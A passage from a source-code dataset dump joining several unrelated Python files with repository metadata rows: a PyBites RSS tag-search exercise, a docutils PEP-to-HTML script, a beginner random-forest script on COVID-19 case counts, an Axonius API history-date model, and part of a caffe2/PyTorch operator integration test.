dt2 = datetime(2017, 1, 6, 11, 0, 0).timetuple()
FEED = AttrDict({'entries':
[AttrDict({'author': 'PyBites',
'link':
'https://pybit.es/twitter_digest_201808.html', # noqa E501
'published': 'Sun, 18 Feb 2018 20:52:00 +0100', # noqa E501
'published_parsed': dt1,
'summary': 'Every weekend we share ...',
'tags': [AttrDict({'term': 'twitter'}),
AttrDict({'term': 'Flask'}),
AttrDict({'term': 'Python'}),
AttrDict({'term': 'Regex'})],
'title': 'Twitter Digest 2018 Week 08'}),
AttrDict({'author': 'Julian',
'link': 'https://pybit.es/pyperclip.html',
'published': 'Fri, 06 Jan 2017 12:00:00 +0100', # noqa E501
'published_parsed': dt2,
'summary': 'Use the Pyperclip module to ...',
'tags': [AttrDict({'term': 'python'}),
AttrDict({'term': 'tips'}),
AttrDict({'term': 'tricks'}),
AttrDict({'term': 'code'}),
AttrDict({'term': 'pybites'})],
'title': 'Copy and Paste with Pyperclip'})]})
def _convert_struct_time_to_dt(stime):
"""Convert a time.struct_time as returned by feedparser into a
datetime.date object, so:
time.struct_time(tm_year=2016, tm_mon=12, tm_mday=28, ...)
-> date(2016, 12, 28)
"""
if type(stime) == str:
format = '%a, %d %b %Y %H:%M:%S %z'
dt_object = datetime.strptime(stime, format)
return dt_object.date()
else:
return datetime.fromtimestamp(mktime(stime)).date()
def get_feed_entries(feed=FEED):
"""Use feedparser to parse PyBites RSS feed.
Return a list of Entry namedtuples (date = date, drop time part)
"""
if type(feed) == AttrDict:
file = feed
else:
file = parse(feed)
output = []
for entry in file.entries:
date = _convert_struct_time_to_dt(entry.published)
tag_list = [tag['term'].lower() for tag in entry.tags]
output.append(Entry(date, entry.title, entry.link, tag_list))
return output
def filter_entries_by_tag(search, entry):
"""Check if search matches any tags as stored in the Entry namedtuple
(case insensitive, only whole, not partial string matches).
Returns bool: True if match, False if not.
Supported searches:
1. If & in search do AND match,
e.g. flask&api should match entries with both tags
2. Elif | in search do an OR match,
e.g. flask|django should match entries with either tag
3. Else: match if search is in tags
"""
search = search.lower()
tag_list = [tag for tag in entry.tags]
if not re.search(r'\|', search) and not re.search(r'\&', search):
return search in tag_list
if re.search(r'\|', search):
search = re.split(r'\|', search)
return any([item in tag_list for item in search])
if re.search(r'\&', search):
search = re.split(r'\&', search)
return all([item in tag_list for item in search])
return search
def main():
"""Entry point to the program
1. Call get_feed_entries and store them in entries
2. Initiate an infinite loop
3. Ask user for a search term:
- if enter was hit (empty string), print 'Please provide a search term'
- if 'q' was entered, print 'Bye' and exit/break the infinite loop
4. Filter/match the entries (see filter_entries_by_tag docstring)
5. Print the title of each match ordered by date ascending
6. Secondly, print the number of matches: 'n entries matched'
(use entry if only 1 match)
"""
entries = get_feed_entries()
while True:
try:
search_term = input('Search for (q for exit): ').lower()
except EOFError:
break
if search_term == '':
print('Please provide a search term')
if search_term != '' and search_term != 'q':
output_list = []
for entry in entries:
if filter_entries_by_tag(search_term, entry):
output_list.append(entry)
output_list = sorted(output_list, key=lambda x: x.date)
titles = ', '.join([entry.title for entry in output_list])
output_number = len(output_list)
if output_number < 1:
print(f'{output_number} entries matched')
if output_number == 1:
print(titles)
print(f'{output_number} entry matched')
if output_number > 1:
print(titles)
print(f'{output_number} entries matched')
if search_term == 'q':
print('Bye')
break
if __name__ == '__main__':
main()
main()
| [
"[email protected]"
] | |
5516c3e347802f4b350ee2dbcccabaeb477b3a74 | 9447fc5874b2edbc5d50d97d1415459d7c0a9a23 | /env/bin/rstpep2html.py | 80e9bd3423e0ff556c539c40519718befa2fd10f | [] | no_license | ivan-podorozhnyi-tr/flask_zappa | b9d11976a2b5d1a315258984ffde6199b4013576 | aba4c482d90ceb5161010e4e4edb9b63feb00735 | refs/heads/master | 2022-11-02T04:11:20.531599 | 2019-10-10T10:31:03 | 2019-10-10T10:31:03 | 214,153,564 | 0 | 1 | null | 2022-10-10T20:02:44 | 2019-10-10T10:28:49 | Python | UTF-8 | Python | false | false | 701 | py | #!/home/ivan/projects/flask_zappa/env/bin/python3
# $Id: rstpep2html.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing HTML from PEP
(Python Enhancement Proposal) documents.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline, default_description
description = ('Generates (X)HTML from reStructuredText-format PEP files. '
+ default_description)
publish_cmdline(reader_name='pep', writer_name='pep_html',
description=description)
| [
"[email protected]"
] | |
1ecb741be63c3d4f4cf27a1f9a5077afa206c9e7 | 587bd3458aadb1f06bd576aab46a7d294d6a0ee2 | /session47.py | cba6a34daa4a8c2c7d7d7bcde7ea6d8900069b81 | [] | no_license | Shimpa11/PythonTutorial | 913635dbbd1f8ed6e2331614040a4f76d22ebacf | 5e5dfe003e5ccf84d4e9754d3192e43009c20c56 | refs/heads/master | 2020-12-13T16:48:12.093667 | 2020-05-08T12:21:27 | 2020-05-08T12:21:27 | 234,344,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,587 | py | """
overfitting and underfitting->regression line does not fit
# predicted values
# good fit / robust fit
# DT limitations
# computationally expensive to train
# carry big risk if overfitting
ENSEMBLE LEARNING
Supervised learning where no of models are combined for prediction
BOOSTING->grp of algos that utilizes weighted avgs to make weak learners into stronger learners
each model predicts the feature for next model
kind synchronus
BOOTSTRAP AGGREGATION(BAGGING)
Running models independently and aggregates output at the end without pref to other model
Ansync or multuthreading
Random Forest Algorithn
->classification and regression
a bagging technique
moedls running parallel with no interaction
tress in RF
operates by constructing a mutltitude of DT at training time and outputting the class is the
model of classes
1.how many DTtrees to be used
2. Dataset to be divided in n number of instances
eg; dataset with 100 records
choose n as 3
T1=33
T2=33
T3->34
three DTrees
predictions from T1, T2 and T2 will be used for final prediction
"""
# working on covid 19 dataset
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestRegressor
from sklearn.model_selection import train_test_split
import statsmodels.api as sm
from sklearn.preprocessing import FunctionTransformer
df=pd.read_csv("covid19-world.csv")
print(df)
indiaDF=df[df['Country']=='India']
print(indiaDF)
X=indiaDF['Date']
Y=indiaDF['Confirmed']
# log=PowerTransformer()
# log.fit(df[['Date']])
# df['log_convertedDF']=log.transform(df[['Date']])
# X=df['log_convertedDF']
print("data for X:")
print(X)
print("Data for Y:")
print(Y)
# plt.plot(X,Y)
# plt.xlabel("Date")
# plt.ylabel("Confirmed cases")
# plt.grid(True)
# plt.show()
# formatting date for our graph
fig,ax=plt.subplots()
ax.plot_date(X,Y, marker='',linestyle="-.")
fig.autofmt_xdate()
plt.show()
# create the model
# 100 DTrees in our model who shall work with bagging technique
model=RandomForestRegressor(n_estimators=100)
# train the model
# transform into 2D array
# X=X[:,np.newaxis]
# date is in string format cannot train model on string
# so we get an error
# So we data Preprocessing-> refining dataset so optimally so that model works perfectly fine
# new transformation
X1=pd.to_datetime(indiaDF['Date'],infer_datetime_format=True)
print(type(X1))
# lg=np.log(indiaDF['Date'])
# X1=pd.to_datetime(indiaDF['Date'],format='%Y-%m-%d')
# converting date type string to datetime which is mathematical
X1=X1[:,np.newaxis]
print(X1)
print()
print(type(X1))
# model.fit(X,Y)-> generates error withX
x_train, x_test, y_train,y_test=train_test_split(X1,Y,test_size=0.2,random_state=1)
# model.fit(X1,Y)
model.fit(x_train,y_train)
# X=sm.add_constant(X)
# model=sm.OLS(y_train,X)
print("Model Trained")
y_pred=model.predict(x_test)
# print(y_pred)
# print(x_test)
#
futurePredictionDates=pd.Series(['2020-02-12','2020-03-12','2020-04-12','2020-05-12'])
futurePredictionDates=pd.to_datetime(futurePredictionDates,infer_datetime_format=True)
print("==========================================")
# 2D array
futurePredictionDates=futurePredictionDates[:,np.newaxis]
futureConfirmedPredictions=model.predict(futurePredictionDates)
print(futurePredictionDates)
print(futureConfirmedPredictions)
# regression model is lagging because predictions are not accurate as data is exponential not linear
# Conclusion : Predictions are not accurate.
# Since as per our dataset, we do have exponential behaviour in our data.
# So we need to do some more of pre-processing
| [
"[email protected]"
] | |
fd673bb693206262ce291422603e04587290cc7c | 5686d1a31b87a47a4774270c00cd141c221cf065 | /axonius_api_client/api/json_api/assets/history_dates_human.py | 35f27f8e20051c05403c10b6c37ebc27af60b4a1 | [
"MIT"
] | permissive | Axonius/axonius_api_client | e7eec0845eee9e1b314446121551c584655c2631 | be49566e590834df1b46494c8588651fa029b8c5 | refs/heads/master | 2023-08-19T04:43:13.717989 | 2023-08-10T18:49:40 | 2023-08-10T18:49:40 | 194,601,817 | 17 | 22 | MIT | 2023-08-30T18:45:15 | 2019-07-01T04:52:21 | Python | UTF-8 | Python | false | false | 7,266 | py | # -*- coding: utf-8 -*-
"""Models for API requests & responses."""
import dataclasses
import datetime
import logging
import typing as t
from ....exceptions import ApiError
from ....tools import coerce_int, dt_now, dt_parse
from ..base import BaseModel
LOGGER = logging.getLogger(__name__)
@dataclasses.dataclass
class AssetTypeHistoryDate(BaseModel):
"""Human exposure of history date for a specific asset type."""
date_api: str
date_api_exact: str
asset_type: str
document_meta: t.Optional[dict] = dataclasses.field(default_factory=dict)
@property
def days_ago(self) -> int:
"""Number of days since date_api passed."""
return self.delta.days
@property
def delta(self) -> datetime.timedelta:
"""Pass."""
return dt_now() - self.date
def calculate_delta(self, value: datetime.datetime) -> datetime.timedelta:
"""Calculate the delta between the date property and a given datetime object."""
return abs(self.date - value)
def calculate_days_ago(self, value: datetime.datetime) -> int:
"""Calculate the number of days between the date property and a given datetime object."""
return self.calculate_delta(value=value).days
@property
def date(self) -> datetime.datetime:
"""Get the history date as datetime object."""
if not hasattr(self, "_date"):
setattr(self, "_date", dt_parse(obj=self.date_api_exact, default_tz_utc=True))
return getattr(self, "_date")
def __str__(self) -> str:
"""Pass."""
return f"date={self.date}, days_ago={self.days_ago}"
@staticmethod
def get_schema_cls() -> t.Any:
"""Get the schema for this model."""
return None
@dataclasses.dataclass
class AssetTypeHistoryDates(BaseModel):
"""Human exposure of history dates for a specific asset type."""
asset_type: str
values: dict
document_meta: t.Optional[dict] = dataclasses.field(default_factory=dict)
DATE_ONLY_FMT: t.ClassVar[str] = "%Y-%m-%d"
DATE_ONLY_VALID_FMTS: t.ClassVar[t.List[str]] = ["YYYY-MM-DD", "YYYYMMDD"]
@property
def dates(self) -> t.List[AssetTypeHistoryDate]:
"""Get the valid history dates for this asset type."""
if not hasattr(self, "_dates"):
# noinspection PyAttributeOutsideInit
self._dates = [
AssetTypeHistoryDate(date_api=k, date_api_exact=v, asset_type=self.asset_type)
for k, v in self.values.items()
]
return self._dates
@property
def dates_by_days_ago(self) -> t.Dict[int, AssetTypeHistoryDate]:
"""Get the valid history dates for this asset type keyed by days_ago."""
return {x.days_ago: x for x in self.dates}
def get_date_nearest(
self, value: t.Union[str, bytes, datetime.timedelta, datetime.datetime]
) -> t.Optional[AssetTypeHistoryDate]:
"""Get a valid history date that is nearest to the supplied value."""
nearest: t.Optional[AssetTypeHistoryDate] = None
if self.dates:
pivot: datetime.datetime = dt_parse(obj=value, default_tz_utc=True)
nearest: AssetTypeHistoryDate = min(self.dates, key=lambda x: x.calculate_delta(pivot))
LOGGER.info(f"Closest {self.asset_type} history date to {pivot} found: {nearest}")
return nearest
def get_date_nearest_days_ago(self, value: int) -> t.Optional[AssetTypeHistoryDate]:
"""Get a valid history date that is nearest to the supplied value."""
nearest: t.Optional[AssetTypeHistoryDate] = None
if self.dates:
pivot: int = coerce_int(value)
nearest = min(
self.dates,
key=lambda x: x.days_ago - pivot if x.days_ago >= pivot else pivot - x.days_ago,
)
LOGGER.info(f"Closest {self.asset_type} history days ago to {pivot} found: {nearest}")
return nearest
def get_date_by_date(
self,
value: t.Optional[t.Union[str, datetime.timedelta, datetime.datetime]] = None,
exact: bool = True,
) -> t.Optional[str]:
"""Get a valid history date.
Args:
value: date to get history date for
exact: if True, raise error if date is not valid, else return nearest valid date
"""
if value:
try:
dt: datetime.datetime = dt_parse(obj=value, default_tz_utc=True)
except Exception:
valid = " or ".join(self.DATE_ONLY_VALID_FMTS)
raise ApiError(f"Invalid history date format {value!r}, format must be {valid}")
date_api: str = dt.strftime(self.DATE_ONLY_FMT)
if date_api in self.values:
return self.values[date_api]
if exact:
err = f"Invalid exact history date {date_api!r}"
raise ApiError(f"{err}\n\n{self}\n\n{err}")
nearest: t.Optional[AssetTypeHistoryDate] = self.get_date_nearest(value=dt)
if isinstance(nearest, AssetTypeHistoryDate):
return nearest.date_api_exact
def get_date_by_days_ago(
self, value: t.Optional[t.Union[int, str]] = None, exact: bool = True
) -> t.Optional[str]:
"""Get date by number of days ago.
Args:
value: days ago to get history date for
exact: if True, raise error if days ago is not valid, else return nearest valid date
"""
if value is not None:
value: int = coerce_int(value)
if value in self.dates_by_days_ago:
return self.dates_by_days_ago[value].date_api_exact
if exact and value != 0:
nums = sorted(list(self.dates_by_days_ago))
err = f"Invalid exact days ago {value!r} (highest={nums[-1]}, lowest={nums[0]})"
raise ApiError(f"{err}\n{self}\n\n{err}")
nearest: t.Optional[AssetTypeHistoryDate] = self.get_date_nearest_days_ago(value=value)
if isinstance(nearest, AssetTypeHistoryDate):
return nearest.date_api_exact
def get_date(
self,
date: t.Optional[t.Union[str, datetime.timedelta, datetime.datetime]] = None,
days_ago: t.Optional[t.Union[int, str]] = None,
exact: bool = True,
) -> t.Optional[str]:
"""Get a valid history date by a specific date or number of days ago.
Args:
date: date to get history date for
days_ago: days ago to get history date for
exact: if True, raise error if date is not valid, else return nearest valid date
"""
return self.get_date_by_date(value=date, exact=exact) or self.get_date_by_days_ago(
value=days_ago, exact=exact
)
@staticmethod
def get_schema_cls() -> t.Any:
"""Get the schema for this model."""
return None
def __repr__(self) -> str:
"""Pass."""
return f"asset_type={self.asset_type}, count={len(self.dates)}"
def __str__(self) -> str:
"""Pass."""
items = [
f"Valid history dates for {self.asset_type}:",
*[f"{x}" for x in self.dates],
]
return "\n".join(items)
| [
"[email protected]"
] | |
b53f31bab239e974a44b18dc9a112a5067df68ee | 00687ee434e9ff98d452c8ca69897d503eecdbc7 | /caffe2/python/operator_test/torch_integration_test.py | 628512953dcae9cc9091baba095ea34250a78002 | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | ajliu/pytorch | 8a7bc45c027a8783705d8aa8a308d7647b8a4494 | 7d809f5d8e93cb6d332297ece071083845e30e26 | refs/heads/master | 2022-12-27T11:53:12.876850 | 2020-10-02T20:08:49 | 2020-10-02T20:37:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39,509 | py |
import caffe2.python.hypothesis_test_util as hu
import hypothesis.strategies as st
import numpy as np
import struct
import torch
import unittest
from caffe2.python import core, workspace
from hypothesis import given, settings
from scipy.stats import norm
def generate_rois(roi_counts, im_dims):
assert len(roi_counts) == len(im_dims)
all_rois = []
for i, num_rois in enumerate(roi_counts):
if num_rois == 0:
continue
# [batch_idx, x1, y1, x2, y2]
rois = np.random.uniform(0, im_dims[i], size=(roi_counts[i], 5)).astype(
np.float32
)
rois[:, 0] = i # batch_idx
# Swap (x1, x2) if x1 > x2
rois[:, 1], rois[:, 3] = (
np.minimum(rois[:, 1], rois[:, 3]),
np.maximum(rois[:, 1], rois[:, 3]),
)
# Swap (y1, y2) if y1 > y2
rois[:, 2], rois[:, 4] = (
np.minimum(rois[:, 2], rois[:, 4]),
np.maximum(rois[:, 2], rois[:, 4]),
)
all_rois.append(rois)
if len(all_rois) > 0:
return np.vstack(all_rois)
return np.empty((0, 5)).astype(np.float32)
def generate_rois_rotated(roi_counts, im_dims):
rois = generate_rois(roi_counts, im_dims)
# [batch_id, ctr_x, ctr_y, w, h, angle]
rotated_rois = np.empty((rois.shape[0], 6)).astype(np.float32)
rotated_rois[:, 0] = rois[:, 0] # batch_id
rotated_rois[:, 1] = (rois[:, 1] + rois[:, 3]) / 2.0 # ctr_x = (x1 + x2) / 2
rotated_rois[:, 2] = (rois[:, 2] + rois[:, 4]) / 2.0 # ctr_y = (y1 + y2) / 2
rotated_rois[:, 3] = rois[:, 3] - rois[:, 1] + 1.0 # w = x2 - x1 + 1
rotated_rois[:, 4] = rois[:, 4] - rois[:, 2] + 1.0 # h = y2 - y1 + 1
rotated_rois[:, 5] = np.random.uniform(-90.0, 90.0) # angle in degrees
return rotated_rois
def create_bbox_transform_inputs(roi_counts, num_classes, rotated):
batch_size = len(roi_counts)
total_rois = sum(roi_counts)
im_dims = np.random.randint(100, 600, batch_size)
rois = (
generate_rois_rotated(roi_counts, im_dims)
if rotated
else generate_rois(roi_counts, im_dims)
)
box_dim = 5 if rotated else 4
deltas = np.random.randn(total_rois, box_dim * num_classes).astype(np.float32)
im_info = np.zeros((batch_size, 3)).astype(np.float32)
im_info[:, 0] = im_dims
im_info[:, 1] = im_dims
im_info[:, 2] = 1.0
return rois, deltas, im_info
# Eigen/Python round 0.5 away from 0, Numpy rounds to even
round_to_nearest = np.vectorize(round)
def bytes_to_floats(byte_matrix):
floats = np.empty([np.shape(byte_matrix)[0], 1], dtype=np.float32)
for i, byte_values in enumerate(byte_matrix):
floats[i], = struct.unpack('f', bytearray(byte_values))
return floats
def floats_to_bytes(floats):
byte_matrix = np.empty([np.shape(floats)[0], 4], dtype=np.uint8)
for i, value in enumerate(floats):
assert isinstance(value, np.float32), (value, floats)
as_bytes = struct.pack('f', value)
# In Python3 bytes will be a list of int, in Python2 a list of string
if isinstance(as_bytes[0], int):
byte_matrix[i] = list(as_bytes)
else:
byte_matrix[i] = list(map(ord, as_bytes))
return byte_matrix
def fused_rowwise_8bit_quantize_reference(data):
minimum = np.min(data, axis=1, keepdims=True)
maximum = np.max(data, axis=1, keepdims=True)
span = maximum - minimum
bias = minimum
scale = span / 255.0
inverse_scale = 255.0 / (span + 1e-8)
quantized_data = round_to_nearest((data - bias) * inverse_scale)
scale_bytes = floats_to_bytes(scale.reshape(-1))
bias_bytes = floats_to_bytes(bias.reshape(-1))
return np.concatenate([quantized_data, scale_bytes, bias_bytes], axis=1)
def fused_rowwise_8bit_quantize_dequantize_reference(data):
fused_quantized = fused_rowwise_8bit_quantize_reference(data)
scale = bytes_to_floats(fused_quantized[:, -8:-4].astype(np.uint8))
bias = bytes_to_floats(fused_quantized[:, -4:].astype(np.uint8))
quantized_data = fused_quantized[:, :-8]
return quantized_data * scale + bias
class TorchIntegration(hu.HypothesisTestCase):
@given(
roi_counts=st.lists(st.integers(0, 5), min_size=1, max_size=10),
num_classes=st.integers(1, 10),
rotated=st.booleans(),
angle_bound_on=st.booleans(),
clip_angle_thresh=st.sampled_from([-1.0, 1.0]),
**hu.gcs_cpu_only
)
def test_bbox_transform(
self,
roi_counts,
num_classes,
rotated,
angle_bound_on,
clip_angle_thresh,
gc,
dc,
):
"""
Test with rois for multiple images in a batch
"""
rois, deltas, im_info = create_bbox_transform_inputs(
roi_counts, num_classes, rotated
)
def bbox_transform_ref():
ref_op = core.CreateOperator(
"BBoxTransform",
["rois", "deltas", "im_info"],
["box_out"],
apply_scale=False,
rotated=rotated,
angle_bound_on=angle_bound_on,
clip_angle_thresh=clip_angle_thresh,
)
workspace.FeedBlob("rois", rois)
workspace.FeedBlob("deltas", deltas)
workspace.FeedBlob("im_info", im_info)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("box_out")
box_out = torch.tensor(bbox_transform_ref())
a, b = torch.ops._caffe2.BBoxTransform(
torch.tensor(rois),
torch.tensor(deltas),
torch.tensor(im_info),
[1.0, 1.0, 1.0, 1.0],
False,
rotated,
angle_bound_on,
-90,
90,
clip_angle_thresh,
legacy_plus_one=True,
)
torch.testing.assert_allclose(box_out, a)
@given(
roi_counts=st.lists(st.integers(0, 5), min_size=1, max_size=10),
num_classes=st.integers(1, 10),
rotated=st.booleans(),
angle_bound_on=st.booleans(),
clip_angle_thresh=st.sampled_from([-1.0, 1.0]),
**hu.gcs_cpu_only
)
def test_box_with_nms_limits(
self,
roi_counts,
num_classes,
rotated,
angle_bound_on,
clip_angle_thresh,
gc,
dc,
):
rotated = False # FIXME remove this after rotation is supported
rois, deltas, im_info = create_bbox_transform_inputs(
roi_counts, num_classes, rotated
)
pred_bbox, batch_splits = [
t.detach().numpy()
for t in torch.ops._caffe2.BBoxTransform(
torch.tensor(rois),
torch.tensor(deltas),
torch.tensor(im_info),
[1.0, 1.0, 1.0, 1.0],
False,
rotated,
angle_bound_on,
-90,
90,
clip_angle_thresh,
legacy_plus_one=True,
)
]
class_prob = np.random.randn(sum(roi_counts), num_classes).astype(np.float32)
score_thresh = 0.5
nms_thresh = 0.5
topk_per_image = sum(roi_counts) / 2
def box_with_nms_limit_ref():
input_blobs = ["class_prob", "pred_bbox", "batch_splits"]
output_blobs = [
"score_nms",
"bbox_nms",
"class_nms",
"batch_splits_nms",
"keeps_nms",
"keeps_size_nms",
]
ref_op = core.CreateOperator(
"BoxWithNMSLimit",
input_blobs,
output_blobs,
score_thresh=float(score_thresh),
nms=float(nms_thresh),
detections_per_im=int(topk_per_image),
soft_nms_enabled=False,
soft_nms_method="linear",
soft_nms_sigma=0.5,
soft_nms_min_score_thres=0.001,
rotated=rotated,
)
workspace.FeedBlob("class_prob", class_prob)
workspace.FeedBlob("pred_bbox", pred_bbox)
workspace.FeedBlob("batch_splits", batch_splits)
workspace.RunOperatorOnce(ref_op)
return (workspace.FetchBlob(b) for b in output_blobs)
output_refs = box_with_nms_limit_ref()
outputs = torch.ops._caffe2.BoxWithNMSLimit(
torch.tensor(class_prob),
torch.tensor(pred_bbox),
torch.tensor(batch_splits),
score_thresh=float(score_thresh),
nms=float(nms_thresh),
detections_per_im=int(topk_per_image),
soft_nms_enabled=False,
soft_nms_method="linear",
soft_nms_sigma=0.5,
soft_nms_min_score_thres=0.001,
rotated=rotated,
cls_agnostic_bbox_reg=False,
input_boxes_include_bg_cls=True,
output_classes_include_bg_cls=True,
legacy_plus_one=True,
)
for o, o_ref in zip(outputs, output_refs):
torch.testing.assert_allclose(o, o_ref)
@given(
dim_1=st.integers(min_value=10, max_value=10),
dim_2=st.integers(min_value=3, max_value=3),
dim_3=st.integers(min_value=2, max_value=2),
)
def test_sparse_to_dense_mask(self, dim_1, dim_2, dim_3):
indices = np.array([i + 1 for i in range(dim_1)]).astype(np.int32)
values = np.random.rand(dim_1, dim_2, dim_3).astype(np.float32)
default_value = np.zeros((dim_2, dim_3)).astype(np.float32)
mask = [2, 4, 9]
def sparse_to_dense_mask_ref(return_presence_mask=False):
ref_op = core.CreateOperator(
"SparseToDenseMask",
["indices", "values", "default_value"],
["output", "presence_mask"],
mask=mask,
return_presence_mask=return_presence_mask,
)
workspace.FeedBlob("indices", indices)
workspace.FeedBlob("values", values)
workspace.FeedBlob("default_value", default_value)
workspace.RunOperatorOnce(ref_op)
if return_presence_mask:
return (
workspace.FetchBlob("output"),
workspace.FetchBlob("presence_mask"),
)
return workspace.FetchBlob("output")
# Testing return_presence_mask = False
output = sparse_to_dense_mask_ref()
output = torch.tensor(output)
a, _ = torch.ops._caffe2.SparseToDenseMask(
torch.tensor(indices),
torch.tensor(values),
torch.tensor(default_value),
None,
mask=mask,
)
torch.testing.assert_allclose(output, a)
# Testing return_presence_mask = True
output, presence_mask = sparse_to_dense_mask_ref(return_presence_mask=True)
output = torch.tensor(output)
presence_mask = torch.tensor(presence_mask)
a, b = torch.ops._caffe2.SparseToDenseMask(
torch.tensor(indices),
torch.tensor(values),
torch.tensor(default_value),
None,
mask=mask,
return_presence_mask=True,
)
torch.testing.assert_allclose(output, a)
torch.testing.assert_allclose(presence_mask, b)
@given(
A=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
img_count=st.integers(min_value=3, max_value=3),
)
def test_generate_proposals(self, A, H, W, img_count):
scores = np.ones((img_count, A, H, W)).astype(np.float32)
bbox_deltas = (
np.linspace(0, 10, num=img_count * 4 * A * H * W)
.reshape((img_count, 4 * A, H, W))
.astype(np.float32)
)
im_info = np.ones((img_count, 3)).astype(np.float32) / 10
anchors = np.ones((A, 4)).astype(np.float32)
def generate_proposals_ref():
ref_op = core.CreateOperator(
"GenerateProposals",
["scores", "bbox_deltas", "im_info", "anchors"],
["rois", "rois_probs"],
spatial_scale=2.0,
)
workspace.FeedBlob("scores", scores)
workspace.FeedBlob("bbox_deltas", bbox_deltas)
workspace.FeedBlob("im_info", im_info)
workspace.FeedBlob("anchors", anchors)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("rois"), workspace.FetchBlob("rois_probs")
rois, rois_probs = generate_proposals_ref()
rois = torch.tensor(rois)
rois_probs = torch.tensor(rois_probs)
a, b = torch.ops._caffe2.GenerateProposals(
torch.tensor(scores),
torch.tensor(bbox_deltas),
torch.tensor(im_info),
torch.tensor(anchors),
2.0,
6000,
300,
0.7,
16,
True,
-90,
90,
1.0,
legacy_plus_one=True,
)
torch.testing.assert_allclose(rois, a)
torch.testing.assert_allclose(rois_probs, b)
@given(
bsz=st.integers(1, 5),
seq_lens=st.integers(1, 6),
emb_lens=st.integers(5, 10),
hidden_size=st.integers(3, 7),
num_layers=st.integers(1, 4),
has_biases=st.booleans(),
is_bidirectional=st.booleans(),
batch_first=st.booleans(),
)
def test_inference_lstm(
self,
bsz,
seq_lens,
emb_lens,
hidden_size,
num_layers,
has_biases,
is_bidirectional,
batch_first,
):
num_directions = 2 if is_bidirectional else 1
hx = np.zeros((num_layers * num_directions, bsz, hidden_size), dtype=np.float32)
if batch_first:
inputs = np.random.randn(bsz, seq_lens, emb_lens).astype(np.float32)
else:
inputs = np.random.randn(seq_lens, bsz, emb_lens).astype(np.float32)
torch_lstm = torch.nn.LSTM(
emb_lens,
hidden_size,
batch_first=batch_first,
bidirectional=is_bidirectional,
bias=has_biases,
num_layers=num_layers,
)
def inference_lstm_ref():
input_names = ["inputs", "hidden_0", "hidden_1"]
workspace.FeedBlob("inputs", inputs)
workspace.FeedBlob("hidden_0", hx)
workspace.FeedBlob("hidden_1", hx)
for i, param in enumerate(torch_lstm._flat_weights):
input_names.append("param_{}".format(i))
workspace.FeedBlob("param_{}".format(i), param.detach().numpy())
ref_op = core.CreateOperator(
"InferenceLSTM",
input_names,
["output", "hidden", "cell"],
num_layers=num_layers,
has_biases=has_biases,
batch_first=batch_first,
bidirectional=is_bidirectional,
)
workspace.RunOperatorOnce(ref_op)
return (
workspace.FetchBlob("output"),
workspace.FetchBlob("hidden"),
workspace.FetchBlob("cell")
)
output, hidden, cell = inference_lstm_ref()
output = torch.tensor(output)
hidden = torch.tensor(hidden)
cell = torch.tensor(cell)
lstm_in = [
torch.from_numpy(inputs),
torch.from_numpy(hx),
torch.from_numpy(hx),
] + [param.detach() for param in torch_lstm._flat_weights]
a, b, c = torch.ops._caffe2.InferenceLSTM(
lstm_in, num_layers, has_biases, batch_first, is_bidirectional
)
torch.testing.assert_allclose(output, a)
torch.testing.assert_allclose(hidden, b)
torch.testing.assert_allclose(cell, c)
# Test case is using workspace.has_cuda_support and not workspace.has_gpu_support
# to exclude it from HIP because tensor interop doesn't work for HIP tensors yet
@unittest.skipIf(not workspace.has_cuda_support, "No cuda support")
@given(
A=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
img_count=st.integers(min_value=3, max_value=3),
)
def test_generate_proposals_cuda(self, A, H, W, img_count):
scores = np.ones((img_count, A, H, W)).astype(np.float32)
bbox_deltas = (
np.linspace(0, 10, num=img_count * 4 * A * H * W)
.reshape((img_count, 4 * A, H, W))
.astype(np.float32)
)
im_info = np.ones((img_count, 3)).astype(np.float32) / 10
anchors = np.ones((A, 4)).astype(np.float32)
def generate_proposals_ref():
ref_op = core.CreateOperator(
"GenerateProposals",
["scores", "bbox_deltas", "im_info", "anchors"],
["rois", "rois_probs"],
spatial_scale=2.0,
)
workspace.FeedBlob("scores", scores)
workspace.FeedBlob("bbox_deltas", bbox_deltas)
workspace.FeedBlob("im_info", im_info)
workspace.FeedBlob("anchors", anchors)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("rois"), workspace.FetchBlob("rois_probs")
rois, rois_probs = generate_proposals_ref()
rois = torch.tensor(rois)
rois_probs = torch.tensor(rois_probs)
a, b = torch.ops._caffe2.GenerateProposals(
torch.tensor(scores).cuda(),
torch.tensor(bbox_deltas).cuda(),
torch.tensor(im_info).cuda(),
torch.tensor(anchors).cuda(),
2.0,
6000,
300,
0.7,
16,
True,
-90,
90,
1.0,
legacy_plus_one=True,
)
torch.testing.assert_allclose(rois, a.cpu())
torch.testing.assert_allclose(rois_probs, b.cpu())
@given(
N=st.integers(min_value=1, max_value=2),
C=st.integers(min_value=4, max_value=4),
H=st.integers(min_value=10, max_value=10),
W=st.integers(min_value=8, max_value=8),
)
def _test_roi_align(self, N, C, H, W, device):
def rand_roi():
return np.array(
[
float(int(N * np.random.rand())),
0.5 * np.random.rand() * W,
0.5 * np.random.rand() * H,
(0.5 + 0.5 * np.random.rand()) * W,
(0.5 + 0.5 * np.random.rand()) * H,
]
).astype(np.float32)
feature = np.random.randn(N, C, H, W).astype(np.float32)
rois = np.array([rand_roi() for _ in range(10)])
def roi_align_ref(_feature, _rois):
ref_op = core.CreateOperator(
"RoIAlign",
["feature", "rois"],
["roi_feature"],
spatial_scale=1.0,
pooled_h=3,
pooled_w=3,
sampling_ratio=0,
)
workspace.FeedBlob("feature", _feature)
workspace.FeedBlob("rois", _rois)
workspace.RunOperatorOnce(ref_op)
return workspace.FetchBlob("roi_feature")
roi_feature_ref = roi_align_ref(feature, rois)
